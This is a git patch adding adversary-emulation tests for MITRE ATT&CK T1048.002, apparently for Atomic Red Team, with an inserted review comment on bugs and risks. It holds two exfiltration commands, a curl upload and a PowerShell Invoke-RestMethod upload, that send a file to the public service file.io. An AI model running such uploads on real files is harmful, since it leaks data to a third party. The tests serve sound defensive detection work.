From 447d5fc601a7399af7b7a299124c3eee40a0be7d Mon Sep 17 00:00:00 2001
From: Daniel Danho
Date: Wed, 17 Nov 2021 11:47:00 +0100
Subject: [PATCH] Implemented initial test for T1048.002 on Linux
---
atomics/T1048.002/T1048.002.yaml | 48 ++++++++++++++++++++++++++++++++
atomics/T1048.002/files/artifact | 1 +
2 files changed, 49 insertions(+)
create mode 100644 atomics/T1048.002/T1048.002.yaml
create mode 100644 atomics/T1048.002/files/artifact
diff --git a/atomics/T1048.002/T1048.002.yaml b/atomics/T1048.002/T1048.002.yaml
new file mode 100644
index 00000000..5cd62562
--- /dev/null
+++ b/atomics/T1048.002/T1048.002.yaml
@@ -0,0 +1,48 @@
+---
+attack_technique: T1048.002
+display_name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
+
+atomic_tests:
+- name: Exfiltrate data HTTPS using curl
+ description: |
+ Exfiltrate data HTTPS using curl to file share site file.io
+
+ supported_platforms:
+ - windows
+ - macos
+ - linux
+
+ input_arguments:
+ input_file:
+ description: Test file to upload
+ type: Path
+ default: PathToAtomicsFolder/T1048.002/files/artifact
+
+ executor:
+ name: bash
+ elevation_required: false
+ command: |
+ curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
+
+
+- name: Exfiltrate data HTTPS using Invoke-RestMethod
+ description: |
+ Exfiltrate data HTTPS using Invoke-RestMethod to file share site file.io
+
+ supported_platforms:
+ - windows
+ - linux
+
+ input_arguments:
+ input_file:
+ description: Test file to upload
+ type: Path
+ default: PathToAtomicsFolder/T1048.002/files/artifact
+
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |-
+ $form = @{ file = Get-item -Path '(#{input_file})'; content_type = 'txt/plain'; autoDelete = 'true'; maxDownloads = '1' }
+ Invoke-RestMethod -Uri https://file.io -Method Post -Form $form
+
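Review bot: The second test's Get-Item path is quoted as `'(#{input_file})'`, so after substitution PowerShell looks for a file literally named `(PathToAtomicsFolder/T1048.002/files/artifact)` and the upload fails before any request is sent; the line should read `$form = @{ file = Get-Item -Path '#{input_file}'; content_type = 'text/plain'; autoDelete = 'true'; maxDownloads = '1' }` (`txt/plain` is not a registered media type either). `Invoke-RestMethod -Form` exists only in PowerShell 6.1 and later, so with `windows` listed in supported_platforms this test will presumably fail under Windows PowerShell 5.1 unless the framework invokes `pwsh`; worth confirming or stating in the description. Both tests send whatever `input_file` points at to a third-party service, so each description should say so explicitly, e.g. `WARNING: this uploads the referenced file to the public service file.io; do not point input_file at real data`. The curl test also lacks `--fail`, so a rejected upload (HTTP 4xx/5xx) still exits 0 and the atomic reports success without any exfiltration having occurred.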
diff --git a/atomics/T1048.002/files/artifact b/atomics/T1048.002/files/artifact
new file mode 100644
index 00000000..ce02d75f
--- /dev/null
+++ b/atomics/T1048.002/files/artifact
@@ -0,0 +1 @@
+T1048.002